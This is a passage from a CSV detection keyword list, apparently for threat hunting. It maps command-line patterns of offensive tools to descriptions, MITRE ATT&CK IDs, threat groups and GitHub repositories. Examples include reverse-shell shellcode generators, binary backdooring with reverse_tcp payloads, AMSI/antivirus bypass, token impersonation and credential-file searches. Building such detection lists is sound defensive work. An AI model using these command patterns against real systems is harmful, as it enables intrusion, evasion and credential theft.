- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"* -ExeArguments *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* exec * -p * -c *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"* exec * --pid * --command *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"* exec-command -clear*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* exec-command -command *","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* exec-command -shell*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* -exec-shellcode *","offensive_tool_keyword","gcat","A PoC 
backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"* execute *NT AUTHORITY\SYSTEM*cmd /c *","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"* execute NT AUTHORITY\SYSTEM* cmd true bypass*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"* --execution false --save True --output *.bin*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"* exegol.apk*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* exegol.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking 
environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* exe-selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* Exfil.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"* exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"* exiting (due to fatal error)*","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"* Exrop(*/bin/*","offensive_tool_keyword","Exrop","Exrop is 
automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"* extract --secrets --zsh*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"* --extra-verbose*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -f *.bin -e AMSI*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"* -f *.bin -e Defender*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"* -f *.dmp windows.cmdline*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 
- T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.dlllist --pid *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.filescan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.handles --pid *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.info*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp 
windows.malfind*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.netscan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.netstat*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.pslist*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.psscan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.pstree*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.registry.hivelist*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.registry.hivescan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.registry.printkey*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.registry.printkey*Software\Microsoft\Windows\CurrentVersion*","greyware_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.exe --encrypt xor --jmp -o *.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"* -f *.exe -m onionduke -b *.dll*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f *.exe -m onionduke -b *.exe*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -f Find-AllVulns*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute 
arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"* -f Find-PathDLLHijack*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"* -f Get-DomainGroupMember* -a *-Identity *admin* -Recurse*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"* -f Invoke-Inveigh*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"* -f kirbi *","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* -f passw -e xlsx csv *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -f passw user admin account network login logon cred *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -f psexec.exe -H * -P * -s reverse_shell_tcp*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f shells/generic1.ps1 *","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f TeamViewer.exe -H * -P * -s 
*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -FakeCmdLine *","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"* -FakeCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"* -FakeDC * -SamAccountName * -Username *","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* fcrdns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --file ownedusers.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --file-smuggler-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* filetransfer -download -src-file *.exe*/tmp*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* filetransfer -upload -src-file *.exe*\temp*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* FileZillaPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* finger.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* fingerprint-strings.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
